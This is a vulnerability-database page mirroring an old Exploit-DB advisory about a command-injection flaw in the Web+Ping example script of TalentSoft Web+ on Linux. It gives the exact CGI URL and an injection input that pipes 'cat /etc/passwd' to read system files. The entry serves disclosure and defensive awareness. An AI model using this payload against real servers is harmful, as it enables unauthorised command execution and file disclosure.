Lucene search
K

TalentSoft Web+ Application Server (Linux) 4.6 - Example Script File Disclosure

🗓️ 26 Sep 2000 00:00:00Reported by DCISTType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 21 Views

Vulnerability in Linux Web+ allows remote file read/execution via script command injection.

Code
source: https://www.securityfocus.com/bid/1725/info

Web+ is a development language for use in creating web-based client/server applications.

In Linux versions of the product, an example script installed in Web+ (Web+Ping) which fails to correctly filter shell meta characters. As a result, parameters passed to this script may contain malicious shell commands, allowing an attacker to remotely execute or read any file which is accessible by the Web+ user.

Windows NT versions of Web+ are apparently not vulnerable.

To exploit simply place a '|' after the parameter you which to provide to
ping and then the command you wish to execute.

e.g:
Goto:
http://target/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml

Then type in host destination box:
127.0.0.1 | cat /etc/passwd

You will then be presented with the contents of the /etc/passwd file. 

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Sep 2000 00:00Current
7.4High risk
Vulners AI Score7.4
21